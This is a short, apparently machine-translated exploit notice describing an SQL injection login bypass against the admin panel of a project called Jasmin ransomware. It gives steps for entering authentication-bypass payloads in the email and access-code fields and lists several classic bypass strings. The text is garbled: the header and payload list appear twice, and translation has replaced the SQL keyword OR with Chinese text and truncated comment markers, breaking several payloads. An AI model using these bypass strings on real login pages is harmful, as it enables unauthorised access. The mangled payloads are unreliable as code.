#利用标题:茉莉勒索软件SQL注入登录旁路
#Google Dork: N/A
#日期: 05-03-2025
#利用作者:buğraenisdönmez
#供应商homepage: https://github.com/codesiddhant/jasmin-ransomware
#软件link: https://github.com/codesiddhant/jasmin-ransomware
#版本: N/A。
#在: Windows上测试
如何利用:
- 有效载荷可以使用:
'或'1'='1
'或''='
'=''或'
'或'1'='1'; -
'或1--
#Google Dork: N/A
#日期: 05-03-2025
#利用作者:buğraenisdönmez
#供应商homepage: https://github.com/codesiddhant/jasmin-ransomware
#软件link: https://github.com/codesiddhant/jasmin-ransomware
#版本: N/A。
#在: Windows上测试
如何利用:
- 通过: http://localhost/login.php打开管理面板
- 输入SQL Injection Auth旁路有效载荷到电子邮件,例如:'=''或'
- 要访问代码,请输入相同的SQL注入身份验证旁路有效载荷:'=''或'
- 按授权
- 恭喜,你在
- 有效载荷可以使用:
'或'1'='1
'或''='
'=''或'
'或'1'='1'; -
'或1--